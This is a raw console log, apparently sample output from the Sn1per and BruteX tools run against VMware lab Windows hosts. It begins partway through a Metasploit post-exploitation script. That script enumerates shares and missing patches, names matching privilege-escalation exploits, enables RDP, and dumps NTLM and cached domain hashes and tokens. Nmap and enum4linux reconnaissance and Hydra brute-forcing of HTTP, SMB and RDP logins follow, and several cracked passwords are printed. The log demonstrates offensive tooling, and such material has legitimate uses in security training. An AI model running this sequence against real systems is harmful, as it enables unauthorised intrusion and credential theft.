hacker:1005:e52cac67419a9a2217e4c3576fe93615:b490b475e987909ae9bd83a65aa94665:::


[*] Post module execution completed
resource (/pentest/windows/metasploit-windows-post-exploitation-critical.rc)> use post/windows/gather/enum_shares
resource (/pentest/windows/metasploit-windows-post-exploitation-critical.rc)> run
[*] Running against session 9
[*] The following shares were found:
[*] 	Name: C
[*] 	Path: C:\
[*] 	Type: 0
[*] 
[*] 	Name: Downloads
[*] 	Path: C:\Documents and Settings\test\My Documents\Downloads
[*] 	Type: 0
[*] 
[*] Post module execution completed
resource (/pentest/windows/metasploit-windows-post-exploitation-critical.rc)> use post/windows/gather/enum_patches
resource (/pentest/windows/metasploit-windows-post-exploitation-critical.rc)> run
[+] KB2871997 is missing
[+] KB2928120 is missing
[+] KB977165 - Possibly vulnerable to MS10-015 kitrap0d if Windows 2K SP4 - Windows 7 (x86)
[+] KB2305420 - Possibly vulnerable to MS10-092 schelevator if Vista, 7, and 2008
[+] KB2592799 - Possibly vulnerable to MS11-080 afdjoinleaf if XP SP2/SP3 Win 2k3 SP2
[+] KB2778930 - Possibly vulnerable to MS13-005 hwnd_broadcast, elevates from Low to Medium integrity
[+] KB2850851 - Possibly vulnerable to MS13-053 schlamperei if x86 Win7 SP0/SP1
[+] KB2870008 - Possibly vulnerable to MS13-081 track_popup_menu if x86 Windows 7 SP0/SP1
[*] Post module execution completed
resource (/pentest/windows/metasploit-windows-post-exploitation-critical.rc)> use post/windows/gather/credentials/domain_hashdump
resource (/pentest/windows/metasploit-windows-post-exploitation-critical.rc)> run
[-] This does not appear to be an AD Domain Controller
[*] Post module execution completed
resource (/pentest/windows/metasploit-windows-post-exploitation-critical.rc)> use post/windows/manage/enable_rdp
resource (/pentest/windows/metasploit-windows-post-exploitation-critical.rc)> run
[*] Enabling Remote Desktop
[*] 	RDP is already enabled
[*] Setting Terminal Services service startup mode
[*] 	Terminal Services service is already set to auto
[*] 	Opening port in local firewall if necessary
[*] For cleanup execute Meterpreter resource file: /root/.msf5/loot/20160201074436_default_192.168.1.129_host.windows.cle_349030.txt
[*] Post module execution completed
resource (/pentest/windows/metasploit-windows-post-exploitation-critical.rc)> use post/windows/gather/enum_domain
resource (/pentest/windows/metasploit-windows-post-exploitation-critical.rc)> run
[*] Post module execution completed
resource (/pentest/windows/metasploit-windows-post-exploitation-critical.rc)> use post/windows/gather/credentials/credential_collector
resource (/pentest/windows/metasploit-windows-post-exploitation-critical.rc)> run
[*] Running module against TEST-3F6416AC49
[+] Collecting hashes...
    Extracted: Administrator:e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c
    Extracted: Guest:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0
    Extracted: hacker:e52cac67419a9a2217e4c3576fe93615:b490b475e987909ae9bd83a65aa94665
    Extracted: HelpAssistant:447873b78295638165d0a1a58736c426:c379debb205ae80e84bda1b3d430b6c8
    Extracted: SUPPORT_388945a0:aad3b435b51404eeaad3b435b51404ee:1534c54bed98875639d7e77ae9d51345
    Extracted: test:e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c
    Extracted: test2:e52cac67419a9a2217e4c3576fe93615:b490b475e987909ae9bd83a65aa94665
[+] Collecting tokens...
    NT AUTHORITY\LOCAL SERVICE
    NT AUTHORITY\NETWORK SERVICE
    NT AUTHORITY\SYSTEM
    XEROSECURITY\Administrator
    NT AUTHORITY\ANONYMOUS LOGON
    TEST-3F6416AC49\Administrator
    TEST-3F6416AC49\Guest
    TEST-3F6416AC49\test
    XEROSECURITY\user
[*] Post module execution completed
resource (/pentest/windows/metasploit-windows-post-exploitation-critical.rc)> use post/windows/gather/enum_computers
resource (/pentest/windows/metasploit-windows-post-exploitation-critical.rc)> run
[*] Running module against TEST-3F6416AC49
[-] This host is not part of a domain.
[*] Post module execution completed
resource (/pentest/windows/metasploit-windows-post-exploitation-critical.rc)> use post/windows/gather/cachedump
resource (/pentest/windows/metasploit-windows-post-exploitation-critical.rc)> run
[*] Executing module against TEST-3F6416AC49
[*] Cached Credentials Setting: 10 - (Max is 50 and 0 disables, and 10 is default)
[*] Obtaining boot key...
[*] Obtaining Lsa key...
[*] XP or below system
[*] Obtaining LK$KM...
[*] Dumping cached credentials...
[*] Hash are in MSCACHE format. (mscash)
[*] MSCACHE v1 saved in: /root/.msf5/loot/20160201074451_default_192.168.1.129_mscache.creds_214171.txt
[*] John the Ripper format:
# mscash
user:M$user#c158f3e72ab78ed2adb9d0fab0e1ec23:XEROSECURITY.COMn:XEROSECURITY
administrator:M$administrator#0620d5420b059bf1ead3532f9ec4ddff:XEROSECURITY.COMA:XEROSECURITY

[*] Post module execution completed
resource (/pentest/windows/metasploit-windows-post-exploitation-critical.rc)> use post/windows/gather/enum_ad_computers
resource (/pentest/windows/metasploit-windows-post-exploitation-critical.rc)> run
[-] extapi_adsi_domain_query: Operation failed: 2147950650
[*] Post module execution completed

ENUMERATION


                ____               
    _________  /  _/___  ___  _____
   / ___/ __ \ / // __ \/ _ \/ ___/
  (__  ) / / // // /_/ /  __/ /    
 /____/_/ /_/___/ .___/\___/_/     
               /_/                 

 + -- --=[http://xerosecurity.com
 + -- --=[sn1per v1.6 by 1N3

################################### Running recon #################################
Server:		206.248.154.22
Address:	206.248.154.22#53

** server can't find 138.1.168.192.in-addr.arpa: NXDOMAIN

Host 138.1.168.192.in-addr.arpa. not found: 3(NXDOMAIN)

################################### Pinging host ###################################
PING 192.168.1.138 (192.168.1.138) 56(84) bytes of data.
64 bytes from 192.168.1.138: icmp_seq=1 ttl=128 time=0.555 ms

--- 192.168.1.138 ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 0.555/0.555/0.555/0.000 ms

################################### Running port scan ##############################

Starting Nmap 7.01 ( https://nmap.org ) at 2016-01-30 20:10 EST
Nmap scan report for 192.168.1.138
Host is up (0.00021s latency).
Not shown: 65506 closed ports
PORT      STATE SERVICE      VERSION
42/tcp    open  tcpwrapped
53/tcp    open  domain       Microsoft DNS
80/tcp    open  http         Microsoft IIS httpd 8.5
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/8.5
|_http-title: IIS Windows Server
88/tcp    open  kerberos-sec Windows 2003 Kerberos (server time: 2016-01-31 01:16:20Z)
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows 98 netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds (primary domain: XEROSECURITY)
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap
3269/tcp  open  tcpwrapped
5985/tcp  open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf       .NET Message Framing
47001/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49152/tcp open  msrpc        Microsoft Windows RPC
49153/tcp open  msrpc        Microsoft Windows RPC
49154/tcp open  msrpc        Microsoft Windows RPC
49155/tcp open  msrpc        Microsoft Windows RPC
49157/tcp open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
49158/tcp open  msrpc        Microsoft Windows RPC
49159/tcp open  msrpc        Microsoft Windows RPC
49164/tcp open  msrpc        Microsoft Windows RPC
49165/tcp open  msrpc        Microsoft Windows RPC
49168/tcp open  msrpc        Microsoft Windows RPC
49170/tcp open  msrpc        Microsoft Windows RPC
49174/tcp open  msrpc        Microsoft Windows RPC
49188/tcp open  msrpc        Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port445-TCP:V=7.01%I=7%D=1/30%Time=56AD6069%P=x86_64-pc-linux-gnu%r(SMB
SF:ProgNeg,8B,"\0\0\0\x87\xffSMBr\0\0\0\0\x88\[email protected]\0\0\0\0\0\0\0\0\0\0\0\0
SF:\0\[email protected]\x06\0\0\x01\0\x11\x07\0\x0f2\0\x01\0\x04A\0\0\0\0\x01\0\0\0\0\0\x
SF:fc\xf3\x01\0\xb3\xf6R\xfe\xc4\[\xd1\x01,\x01\x08B\0\^<\x83\x86R\x92\x93
SF:\x9bX\0E\0R\0O\0S\0E\0C\0U\0R\0I\0T\0Y\0\0\0W\0I\0N\0-\x008\0M\0S\0B\x0
SF:02\0D\0D\x005\x002\0P\x009\0\0\0");
MAC Address: 00:0C:29:82:29:F9 (VMware)
Device type: general purpose
Running: Microsoft Windows 7|2012|8.1
OS CPE: cpe:/o:microsoft:windows_7:::ultimate cpe:/o:microsoft:windows_2012 cpe:/o:microsoft:windows_8.1
OS details: Microsoft Windows 7, Windows Server 2012, or Windows 8.1 Update 1
Network Distance: 1 hop
Service Info: Host: WIN-8MSB2DD52P9; OSs: Windows, Windows 98; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_server_2003, cpe:/o:microsoft:windows_98

Host script results:
|_nbstat: NetBIOS name: WIN-8MSB2DD52P9, NetBIOS user: , NetBIOS MAC: 00:0c:29:82:29:f9 (VMware)
| smb-os-discovery: 
|   OS: Windows Server 2012 R2 Datacenter 9600 (Windows Server 2012 R2 Datacenter 6.3)
|   OS CPE: cpe:/o:microsoft:windows_server_2012::-
|   Computer name: WIN-8MSB2DD52P9
|   NetBIOS computer name: WIN-8MSB2DD52P9
|   Domain name: xerosecurity.com
|   Forest name: xerosecurity.com
|   FQDN: WIN-8MSB2DD52P9.xerosecurity.com
|_  System time: 2016-01-30T20:17:18-05:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: required
|_smbv2-enabled: Server supports SMBv2 protocol

TRACEROUTE
HOP RTT     ADDRESS
1   0.21 ms 192.168.1.138

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 408.91 seconds

Starting Nmap 7.01 ( https://nmap.org ) at 2016-01-30 20:17 EST
Nmap scan report for 192.168.1.138
Host is up (0.00021s latency).
Not shown: 5 closed ports
PORT    STATE         SERVICE      VERSION
53/udp  open          domain       Microsoft DNS
|_dns-recursion: Recursion appears to be enabled
67/udp  open|filtered dhcps
88/udp  open          kerberos-sec Windows 2003 Kerberos (server time: 2016-01-31 01:17:36Z)
137/udp open          netbios-ns   Microsoft Windows netbios-ssn (workgroup: XEROSECURITY)
138/udp open|filtered netbios-dgm
161/udp open|filtered snmp
| snmp-hh3c-logins: 
|_  baseoid: 1.3.6.1.4.1.25506.2.12.1.1.1
389/udp open|filtered ldap
MAC Address: 00:0C:29:82:29:F9 (VMware)
Too many fingerprints match this host to give specific OS details
Network Distance: 1 hop
Service Info: Host: WIN-8MSB2DD52P9; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2003, cpe:/o:microsoft:windows

Host script results:
|_nbstat: NetBIOS name: WIN-8MSB2DD52P9, NetBIOS user: , NetBIOS MAC: 00:0c:29:82:29:f9 (VMware)

TRACEROUTE
HOP RTT     ADDRESS
1   0.21 ms 192.168.1.138

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 106.15 seconds

################################### Running Intrusive Scans ########################
+ -- --=[Port 21 closed... skipping.
+ -- --=[Port 22 closed... skipping.
+ -- --=[Port 23 closed... skipping.
+ -- --=[Port 25 closed... skipping.
+ -- --=[Port 53 opened... running tests...

Starting Nmap 7.01 ( https://nmap.org ) at 2016-01-30 20:19 EST
Nmap scan report for 192.168.1.138
Host is up (0.00021s latency).
PORT   STATE SERVICE VERSION
53/tcp open  domain?
|_dns-fuzz: ERROR: Script execution failed (use -d to debug)
|_dns-nsec-enum: Can't determine domain for host 192.168.1.138; use dns-nsec-enum.domains script arg.
|_dns-nsec3-enum: Can't determine domain for host 192.168.1.138; use dns-nsec3-enum.domains script arg.
MAC Address: 00:0C:29:82:29:F9 (VMware)

Host script results:
| dns-blacklist: 
|   SPAM
|_    l2.apews.org - FAIL
|_dns-brute: Can't guess domain of "192.168.1.138"; use dns-brute.domain script argument.

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 144.06 seconds
+ -- --=[Port 79 closed... skipping.
+ -- --=[Port 80 opened... running tests...

                                 ^     ^
        _   __  _   ____ _   __  _    _   ____
       ///7/ /.' \ / __////7/ /,' \ ,' \ / __/
      | V V // o // _/ | V V // 0 // 0 // _/  
      |_n_,'/_n_//_/   |_n_,' \_,' \_,'/_/    
                                <   
                                 ...'
                                 
    WAFW00F - Web Application Firewall Detection Tool
    
    By Sandro Gauci && Wendel G. Henrique

Checking http://192.168.1.138
Generic Detection results:
The site http://192.168.1.138 seems to be behind a WAF 
Reason: The server header is different when an attack is detected.
The server header for a normal response is "Microsoft-IIS/8.5", while the server header a response to an attack is "Microsoft-HTTPAPI/2.0.",
Number of requests: 12

http://192.168.1.138 [200] Country[RESERVED][ZZ], HTTPServer[Microsoft-IIS/8.5], IP[192.168.1.138], Microsoft-IIS[8.5], Title[IIS Windows Server]


+ -- --=[Port 139 opened... running tests...
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Sat Jan 30 20:22:46 2016

 ========================== 
|    Target Information    |
 ========================== 
Target ........... 192.168.1.138
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none


 ===================================================== 
|    Enumerating Workgroup/Domain on 192.168.1.138    |
 ===================================================== 
[+] Got domain/workgroup name: XEROSECURITY

 ============================================= 
|    Nbtstat Information for 192.168.1.138    |
 ============================================= 
Looking up status of 192.168.1.138
	WIN-8MSB2DD52P9 <00> -         M   Workstation Service
	XEROSECURITY    <00> -  M   Domain/Workgroup Name
	XEROSECURITY    <1c> -  M   Domain Controllers
	WIN-8MSB2DD52P9 <20> -         M   File Server Service
	XEROSECURITY    <1b> -         M   Domain Master Browser

	MAC Address = 00-0C-29-82-29-F9

 ====================================== 
|    Session Check on 192.168.1.138    |
 ====================================== 
[+] Server 192.168.1.138 allows sessions using username '', password ''

 ============================================ 
|    Getting domain SID for 192.168.1.138    |
 ============================================ 
Domain Name: XEROSECURITY
Domain Sid: S-1-5-21-1088676282-494858925-2056655024
[+] Host is part of a domain (not a workgroup)

 ======================================= 
|    OS information on 192.168.1.138    |
 ======================================= 
[+] Got OS info for 192.168.1.138 from smbclient: Domain=[XEROSECURITY] OS=[Windows Server 2012 R2 Datacenter 9600] Server=[Windows Server 2012 R2 Datacenter 6.3]
[+] Got OS info for 192.168.1.138 from srvinfo:
Could not initialise srvsvc. Error was NT_STATUS_ACCESS_DENIED

 ============================== 
|    Users on 192.168.1.138    |
 ============================== 
[E] Couldn't find users using querydispinfo: NT_STATUS_ACCESS_DENIED

[E] Couldn't find users using enumdomusers: NT_STATUS_ACCESS_DENIED

 ========================================== 
|    Share Enumeration on 192.168.1.138    |
 ========================================== 
[E] Can't list shares: NT_STATUS_ACCESS_DENIED

[+] Attempting to map shares on 192.168.1.138

 ===================================================== 
|    Password Policy Information for 192.168.1.138    |
 ===================================================== 
[E] Can't connect to host with supplied credentials.

[E] Failed to get password policy with rpcclient


 =============================== 
|    Groups on 192.168.1.138    |
 =============================== 

[+] Getting builtin groups:

[+] Getting builtin group memberships:

[+] Getting local groups:

[+] Getting local group memberships:

[+] Getting domain groups:

[+] Getting domain group memberships:

 ======================================================================== 
|    Users on 192.168.1.138 via RID cycling (RIDS: 500-550,1000-1050)    |
 ======================================================================== 
[E] Couldn't get SID: NT_STATUS_ACCESS_DENIED.  RID cycling not possible.

 ============================================== 
|    Getting printer info for 192.168.1.138    |
 ============================================== 
Could not initialise spoolss. Error was NT_STATUS_ACCESS_DENIED


enum4linux complete on Sat Jan 30 20:22:46 2016

Traceback (most recent call last):
  File "bin/samrdump.py", line 159, in 
    logger.init()
AttributeError: 'module' object has no attribute 'init'
Doing NBT name scan for addresses from 192.168.1.138

IP address       NetBIOS Name     Server    User             MAC address      
------------------------------------------------------------------------------
192.168.1.138    WIN-8MSB2DD52P9            00:0c:29:82:29:f9

Starting Nmap 7.01 ( https://nmap.org ) at 2016-01-30 20:22 EST
Nmap scan report for 192.168.1.138
Host is up (0.00023s latency).
PORT    STATE SERVICE     VERSION
139/tcp open  netbios-ssn Microsoft Windows 98 netbios-ssn
MAC Address: 00:0C:29:82:29:F9 (VMware)
Service Info: OS: Windows 98; CPE: cpe:/o:microsoft:windows_98

Host script results:
| smb-brute: 
|_  guest: => Valid credentials, account disabled
| smb-enum-shares: 
|   note: ERROR: Enumerating shares failed, guessing at common ones (NT_STATUS_ACCESS_DENIED)
|   account_used: 
|   ADMIN$: 
|     warning: Couldn't get details for share: NT_STATUS_ACCESS_DENIED
|     Anonymous access: 
|   C$: 
|     warning: Couldn't get details for share: NT_STATUS_ACCESS_DENIED
|     Anonymous access: 
|   DESKTOP: 
|     warning: Couldn't get details for share: NT_STATUS_ACCESS_DENIED
|     Anonymous access: 
|   IPC$: 
|     warning: Couldn't get details for share: NT_STATUS_ACCESS_DENIED
|     Anonymous access: READ
|   NETLOGON: 
|     warning: Couldn't get details for share: NT_STATUS_ACCESS_DENIED
|_    Anonymous access: 
| smb-mbenum: 
|_  ERROR: Call to Browser Service failed with status = 2184
| smb-os-discovery: 
|   OS: Windows Server 2012 R2 Datacenter 9600 (Windows Server 2012 R2 Datacenter 6.3)
|   OS CPE: cpe:/o:microsoft:windows_server_2012::-
|   Computer name: WIN-8MSB2DD52P9
|   NetBIOS computer name: WIN-8MSB2DD52P9
|   Domain name: xerosecurity.com
|   Forest name: xerosecurity.com
|   FQDN: WIN-8MSB2DD52P9.xerosecurity.com
|_  System time: 2016-01-30T20:23:40-05:00
|_smb-print-text: false
| smb-psexec: Can't find the service file: nmap_service.exe (or nmap_service).
| Due to false positives in antivirus software, this module is no
| longer included by default. Please download it from
| https://nmap.org/psexec/nmap_service.exe
|_and place it in nselib/data/psexec/ under the Nmap DATADIR.
| smb-security-mode: 
|   account_used: 
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: required
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: NT_STATUS_ACCESS_DENIED
|_smbv2-enabled: Server supports SMBv2 protocol


 __________                __         ____  ___
 \______   \_______ __ ___/  |_  ____ \   \/  /
  |    |  _/\_  __ \  |  \   __\/ __ \ \     / 
  |    |   \ |  | \/  |  /|  | \  ___/ /     \ 
  |______  / |__|  |____/ |__|  \___  >___/\  \ 
         \/                         \/      \_/

 + -- --=[BruteX v1.3 by 1N3
 + -- --=[http://xerosecurity.com


################################### Running Port Scan ##############################

Starting Nmap 7.01 ( https://nmap.org ) at 2016-01-30 20:29 EST
Nmap scan report for 192.168.1.138
Host is up (0.00081s latency).
Not shown: 21 closed ports
PORT    STATE SERVICE
53/tcp  open  domain
80/tcp  open  http
139/tcp open  netbios-ssn
389/tcp open  ldap
445/tcp open  microsoft-ds
MAC Address: 00:0C:29:82:29:F9 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 0.23 seconds

################################### Running Brute Force ############################

 + -- --=[Port 21 closed... skipping.
 + -- --=[Port 22 closed... skipping.
 + -- --=[Port 23 closed... skipping.
 + -- --=[Port 25 closed... skipping.
 + -- --=[Port 80 opened... running tests...

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Sat Jan 30 20:29:21 2016
URL_BASE: http://192.168.1.138/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://192.168.1.138/ ----
                                                                                                                                                                                                                                       
-----------------
END_TIME: Sat Jan 30 20:29:23 2016
DOWNLOADED: 4612 - FOUND: 0
Hydra v8.1 (c) 2014 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2016-01-30 20:29:23
[WARNING] http-head auth does not work with every server, better use http-get
[DATA] max 30 tasks per 1 server, overall 64 tasks, 1496 login tries (l:34/p:44), ~0 tries per task
[DATA] attacking service http-head on port 80
[80][http-head] host: 192.168.1.138   login: admin   password: <<< %s(un='%s') = %u
[STATUS] attack finished for 192.168.1.138 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2016-01-30 20:29:23
 + -- --=[Port 110 closed... skipping.
 + -- --=[Port 139 opened... running tests...
Hydra v8.1 (c) 2014 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2016-01-30 20:29:23
[INFO] Reduced number of tasks to 1 (smb does not like parallel connections)
[DATA] max 1 task per 1 server, overall 64 tasks, 176 login tries (l:4/p:44), ~2 tries per task
[DATA] attacking service smb on port 445 with SSL
[445][smb] host: 192.168.1.138   login: Administrator   password: Password123$
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2016-01-30 20:29:24
 + -- --=[Port 389 opened... running tests...
Hydra v8.1 (c) 2014 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2016-01-30 20:29:24
[ERROR] you may only use one of -l, -L or -m

Hydra v8.1 (c) 2014 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2016-01-30 20:29:24
[ERROR] you may only use one of -l, -L or -m

 + -- --=[Port 443 closed... skipping.
 + -- --=[Port 445 opened... running tests...
Hydra v8.1 (c) 2014 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2016-01-30 20:29:24
[INFO] Reduced number of tasks to 1 (smb does not like parallel connections)
[DATA] max 1 task per 1 server, overall 64 tasks, 176 login tries (l:4/p:44), ~2 tries per task
[DATA] attacking service smb on port 445 with SSL
[445][smb] host: 192.168.1.138   login: Administrator   password: Password123$
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2016-01-30 20:29:24
################################### Done! ###########################################

BRUTE FORCE


 __________                __         ____  ___
 \______   \_______ __ ___/  |_  ____ \   \/  /
  |    |  _/\_  __ \  |  \   __\/ __ \ \     / 
  |    |   \ |  | \/  |  /|  | \  ___/ /     \ 
  |______  / |__|  |____/ |__|  \___  >___/\  \ 
         \/                         \/      \_/

 + -- --=[BruteX v1.3 by 1N3
 + -- --=[http://xerosecurity.com


################################### Running Port Scan ##############################

Starting Nmap 7.01 ( https://nmap.org ) at 2016-02-01 07:07 EST
Nmap scan report for 192.168.1.129
Host is up (0.0011s latency).
Not shown: 23 closed ports
PORT     STATE SERVICE
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
3389/tcp open  ms-wbt-server
MAC Address: 00:0C:29:FB:8C:7C (VMware)

Nmap done: 1 IP address (1 host up) scanned in 0.22 seconds

################################### Running Brute Force ############################

 + -- --=[Port 21 closed... skipping.
 + -- --=[Port 22 closed... skipping.
 + -- --=[Port 23 closed... skipping.
 + -- --=[Port 25 closed... skipping.
 + -- --=[Port 80 closed... skipping.
 + -- --=[Port 110 closed... skipping.
 + -- --=[Port 139 opened... running tests...
Hydra v8.1 (c) 2014 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2016-02-01 07:07:18
[INFO] Reduced number of tasks to 1 (smb does not like parallel connections)
[DATA] max 1 task per 1 server, overall 64 tasks, 176 login tries (l:4/p:44), ~2 tries per task
[DATA] attacking service smb on port 445 with SSL
[445][smb] host: 192.168.1.129   login: Administrator   password: password
[445][smb] Host: 192.168.1.129 Account: admin Error: Invalid account (Anonymous success)
[445][smb] host: 192.168.1.129   login: guest
[445][smb] host: 192.168.1.129   login: test   password: password
1 of 1 target successfully completed, 3 valid passwords found
Hydra (http://www.thc.org/thc-hydra) finished at 2016-02-01 07:07:18
 + -- --=[Port 389 closed... skipping.
 + -- --=[Port 443 closed... skipping.
 + -- --=[Port 445 opened... running tests...
Hydra v8.1 (c) 2014 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2016-02-01 07:07:18
[INFO] Reduced number of tasks to 1 (smb does not like parallel connections)
[DATA] max 1 task per 1 server, overall 64 tasks, 176 login tries (l:4/p:44), ~2 tries per task
[DATA] attacking service smb on port 445 with SSL
[445][smb] host: 192.168.1.129   login: Administrator   password: password
[445][smb] Host: 192.168.1.129 Account: admin Error: Invalid account (Anonymous success)
[445][smb] host: 192.168.1.129   login: guest
[445][smb] host: 192.168.1.129   login: test   password: password
1 of 1 target successfully completed, 3 valid passwords found
Hydra (http://www.thc.org/thc-hydra) finished at 2016-02-01 07:07:18
 + -- --=[Port 512 closed... skipping.
 + -- --=[Port 513 closed... skipping.
 + -- --=[Port 514 closed... skipping.
 + -- --=[Port 993 closed... skipping.
 + -- --=[Port 1433 closed... skipping.
 + -- --=[Port 1521 closed... skipping.
 + -- --=[Port 3306 closed... skipping.
 + -- --=[Port 3389 opened... running tests...
Hydra v8.1 (c) 2014 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2016-02-01 07:07:18
[WARNING] rdp servers often don't like many connections, use -t 1 or -t 4 to reduce the number of parallel connections and -W 1 or -W 3 to wait between connection to allow the server to recover
[DATA] max 30 tasks per 1 server, overall 64 tasks, 176 login tries (l:4/p:44), ~0 tries per task
[DATA] attacking service rdp on port 3389
[ERROR] Child with pid 9213 terminating, can not connect
[ERROR] Child with pid 9214 terminating, can not connect
[ERROR] Child with pid 9212 terminating, can not connect
[ERROR] Child with pid 9211 terminating, can not connect
[ERROR] Child with pid 9217 terminating, can not connect
[ERROR] Child with pid 9215 terminating, can not connect
[ERROR] Child with pid 9218 terminating, can not connect
[ERROR] Child with pid 9216 terminating, can not connect
[ERROR] Child with pid 9221 terminating, can not connect
[ERROR] Child with pid 9219 terminating, can not connect
[ERROR] Child with pid 9220 terminating, can not connect
[ERROR] Child with pid 9224 terminating, can not connect
[ERROR] Child with pid 9223 terminating, can not connect
[ERROR] Child with pid 9225 terminating, can not connect
[ERROR] Child with pid 9222 terminating, can not connect
[ERROR] Child with pid 9226 terminating, can not connect
[ERROR] Child with pid 9227 terminating, can not connect
[ERROR] Child with pid 9228 terminating, can not connect
^CThe session file ./hydra.restore was written. Type "hydra -R" to resume session.
 + -- --=[Port 5432 closed... skipping.
 + -- --=[Port 5900 closed... skipping.
 + -- --=[Port 5901 closed... skipping.
 + -- --=[Port 8000 closed... skipping.
 + -- --=[Port 8080 closed... skipping.
 + -- --=[Port 8100 closed... skipping.
 + -- --=[Port 6667 closed... skipping.

################################### Done! ###########################################

 __________                __         ____  ___
 \______   \_______ __ ___/  |_  ____ \   \/  /
  |    |  _/\_  __ \  |  \   __\/ __ \ \     / 
  |    |   \ |  | \/  |  /|  | \  ___/ /     \ 
  |______  / |__|  |____/ |__|  \___  >___/\  \ 
         \/                         \/      \_/

 + -- --=[BruteX v1.3 by 1N3
 + -- --=[http://xerosecurity.com


################################### Running Port Scan ##############################

Starting Nmap 7.01 ( https://nmap.org ) at 2016-02-01 07:07 EST
Nmap scan report for 192.168.1.138
Host is up (0.00078s latency).
Not shown: 20 closed ports
PORT     STATE SERVICE
53/tcp   open  domain
80/tcp   open  http
139/tcp  open  netbios-ssn
389/tcp  open  ldap
445/tcp  open  microsoft-ds
3389/tcp open  ms-wbt-server
MAC Address: 00:0C:29:82:29:F9 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 0.22 seconds

################################### Running Brute Force ############################

 + -- --=[Port 21 closed... skipping.
 + -- --=[Port 22 closed... skipping.
 + -- --=[Port 23 closed... skipping.
 + -- --=[Port 25 closed... skipping.
 + -- --=[Port 80 opened... running tests...

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Mon Feb  1 07:07:41 2016
URL_BASE: http://192.168.1.138/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://192.168.1.138/ ----
                                                                                                                                                                                                                                       
-----------------
END_TIME: Mon Feb  1 07:07:43 2016
DOWNLOADED: 4612 - FOUND: 0
Hydra v8.1 (c) 2014 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2016-02-01 07:07:43
[WARNING] http-head auth does not work with every server, better use http-get
[WARNING] Restorefile (./hydra.restore) from a previous session found, to prevent overwriting, you have 10 seconds to abort...
[DATA] max 30 tasks per 1 server, overall 64 tasks, 1496 login tries (l:34/p:44), ~0 tries per task
[DATA] attacking service http-head on port 80
[80][http-head] host: 192.168.1.138   login: admin
[STATUS] attack finished for 192.168.1.138 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2016-02-01 07:07:54
 + -- --=[Port 110 closed... skipping.
 + -- --=[Port 139 opened... running tests...
Hydra v8.1 (c) 2014 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2016-02-01 07:07:54
[INFO] Reduced number of tasks to 1 (smb does not like parallel connections)
[DATA] max 1 task per 1 server, overall 64 tasks, 176 login tries (l:4/p:44), ~2 tries per task
[DATA] attacking service smb on port 445 with SSL
